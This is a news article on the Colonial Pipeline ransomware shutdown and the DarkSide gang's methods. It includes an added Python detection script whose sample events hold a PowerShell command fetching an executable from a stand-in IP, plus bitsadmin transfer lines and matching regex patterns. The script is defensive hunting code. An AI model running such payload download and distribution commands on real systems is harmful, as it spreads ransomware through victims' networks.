Colonial Pipeline Starts Recovery From Ransomware

Report: DarkSide Ransomware Gang Infected Fuel Supplier

After a ransomware incident, Colonial Pipeline Co. says it has restored smaller pipelines that ship fuel to the U.S. East Coast, but its larger ones are still offline as it assesses safety.

The company ships millions of gallons per day of fuels such as gasoline, heating oil, jet fuel and diesel from refineries in the South to East Coast destinations. The company says "smaller lateral lines between terminals and delivery points are now operational," according to an update on Sunday.

Four main lines, however, still are not functioning. Those lines were voluntarily taken offline Friday by the company after it discovered ransomware. The company has not given a timeline as to when full operations will resume (see: Colonial Pipeline Confirms Ransomware Causing Disruptions).

"We are in the process of restoring service to other laterals and will bring our full system back online only when we believe it is safe to do so, and in full compliance with the approval of all federal regulation," the company's Sunday update says.

Colonial Pipeline says it ships 45% of all of the fuel consumed on the East Coast, supplying some 50 million people. Its pipelines extend more than 5,500 miles. There are worries that a prolonged disruption will affect supplies.

As a result, the federal government issued an emergency declaration on Sunday to address possible fuel disruptions. The Federal Motor Carrier Safety Administration issued a regional emergency declaration that allows transport drivers stretching from the South through the Northeast to work more hours through June 8. It applies to 17 states and the District of Columbia.

In the past two days, Colonial says its personnel have "taken additional precautionary measures to help further monitor and protect the safety and security of its pipeline." It has hired the security firm FireEye Mandiant to assist with the investigation, The New York Times reports.

DarkSide Ransomware Group

The Associated Press, citing anonymous U.S. government sources, reports that the ransomware was planted by a criminal gang called DarkSide. Colonial Pipeline has not described what kind of threat or ransom demand the group has made.

Typically, ransomware operators demand a payment in bitcoin by a specific date to receive a decryptor and/or to refrain from publishing leaked data. If the ransom isn't paid, the demand may be increased. Some ransomware groups have set up websites to publicly release stolen data to increase the pressure.

DarkSide often releases stolen data, according to an April 1 blog post from the cybersecurity company Cybereason. DarkSide has demanded ransoms from $200,000 to $2 million, Cybereason writes. The group's website lists data from more than 70 organizations.

The last time DarkSide posted data on the domain, which is a .onion domain on the Tor network, was April 23. Colonial Pipeline's data is not yet on the site.

The group purports to follow a code of conduct that includes not infecting hospitals, hospices, schools, universities, nonprofit organizations and government agencies. It has also claimed to make charitable donations. The BBC reported in October 2020 that Children International, a charity, said it would not accept a nearly $10,000 donation it received from the group in bitcoin.

The group also isn't afraid to market itself. A researcher who goes by MalwareHunterTeam on Twitter noticed in January that DarkSide had features on its website for either press queries or recovery companies, which are ransom negotiators sometimes used by victims.

As for its victims, "DarkSide is observed being used against targets in English-speaking countries and appears to avoid targets in countries associated with former Soviet Bloc nations," Cybereason writes.

Once it has gained access to an organization's systems, the group moves laterally and targets domain controllers, which are the backbone of an organization's IT infrastructure. Cybereason says the group then collects files, credentials and sensitive information.

When those operations are done, DarkSide uses the Microsoft scripting utility PowerShell to download the ransomware binary and puts it on a shared folder within the organization's domain controller itself.

"Later in the attack, after all data has been exfiltrated, the attackers use bitsadmin.exe to distribute the ransomware binary from the shared folder to other assets in the environment in order to maximize the damage," Cybereason writes.
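A defender can hunt for the staging-and-distribution pattern Cybereason describes by correlating process-creation events: a PowerShell download on a domain controller followed by bitsadmin.exe pulls of the same file from that controller's share. This is an added example, not code from the article or from Cybereason; the event tuples, host names, file names and the domain-controller inventory are constructed assumptions, and events are assumed to be in time order.

```python
import re
from collections import defaultdict

# Constructed process-creation events (host, image, command line); all names are made up.
EVENTS = [
    ("DC01", "powershell.exe",
     r"powershell -c Invoke-WebRequest http://198.51.100.7/u.exe -OutFile C:\Shares\Public\u.exe"),
    ("WS-014", "bitsadmin.exe",
     r"bitsadmin /transfer job1 /download /priority high \\DC01\Public\u.exe C:\Windows\Temp\u.exe"),
    ("WS-022", "bitsadmin.exe",
     r"bitsadmin /transfer job2 \\DC01\Public\u.exe C:\Users\Public\u.exe"),
    ("WS-030", "bitsadmin.exe",
     r"bitsadmin /transfer wsus https://updates.example.com/agent.msi C:\Temp\agent.msi"),
    ("WS-031", "powershell.exe", r"powershell -File C:\Scripts\inventory.ps1"),
]
DOMAIN_CONTROLLERS = {"DC01"}  # assumption: the defender supplies this inventory

PS_DOWNLOAD = re.compile(r"(Invoke-WebRequest|DownloadFile|Start-BitsTransfer)", re.I)
EXE_NAME = re.compile(r"([\w.-]+\.(?:exe|dll))\b", re.I)
UNC_SOURCE = re.compile(r"\\\\([\w.-]+)\\[^\s]*?([\w.-]+\.(?:exe|dll))\b", re.I)

def find_dc_share_distribution(events, dcs):
    """Return {(dc, file): [hosts]} for binaries that PowerShell downloaded on a
    domain controller and that bitsadmin.exe later pulled from it over a UNC path."""
    staged = set()             # (dc, filename) pairs written by a PowerShell download
    pulls = defaultdict(list)  # staged pair -> hosts that fetched it with bitsadmin
    for host, image, cmd in events:
        img = image.lower()
        if img == "powershell.exe" and host in dcs and PS_DOWNLOAD.search(cmd):
            names = EXE_NAME.findall(cmd)
            if names:  # the last binary name on the line is the output file
                staged.add((host.upper(), names[-1].lower()))
        elif img == "bitsadmin.exe" and "/transfer" in cmd.lower():
            m = UNC_SOURCE.search(cmd)
            key = (m.group(1).upper(), m.group(2).lower()) if m else None
            if key in staged:
                pulls[key].append(host)
    return dict(pulls)
```

Routine BITS transfers from HTTP sources (the WS-030 event) are ignored; only pulls of a binary previously staged on a domain controller are reported.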

Paying Ransoms Discouraged

Much about the incident against Colonial Pipeline is unknown, including how its network is structured and whether the ransomware affected its operational technology - the systems that control physical devices. One of the fears about attacks against critical infrastructure is that a cyber incident could result in injury or loss of life.

The Cybersecurity and Infrastructure Security Agency says that the Colonial Pipeline incident "underscores the threat that ransomware poses to organizations regardless of size or sector."

"We encourage every organization to take action to strengthen their cybersecurity posture to reduce their exposure to these types of threats," Eric Goldstein, CISA's executive assistant director for cybersecurity, says in a statement.

It remains unclear if Colonial Pipeline will pay a ransom. Experts generally discourage paying ransoms, as it creates an incentive for further attacks. But many organizations have paid, and some insurance policies may cover paying a ransom.

A recent report from the Institute for Security and Technology's Ransomware Task Force listed 48 suggestions created by cybersecurity and policy experts for how the ransomware problem could be curtailed. But the task force's members could not agree on whether ransomware payments should be banned by law (see: Fighting Ransomware: A Call for Cryptocurrency Regulation).

The task force, however, said that "while a company might determine that paying a ransom is economically rational, such a decision supports the criminal enterprise and is rarely in the public interest."

About the Author

Jeremy Kirk

Executive Editor, Security and Technology, ISMG

Kirk was executive editor for security and technology for Information Security Media Group. Reporting from Sydney, Australia, he created "The Ransomware Files" podcast, which tells the harrowing stories of IT pros who have fought back against ransomware.
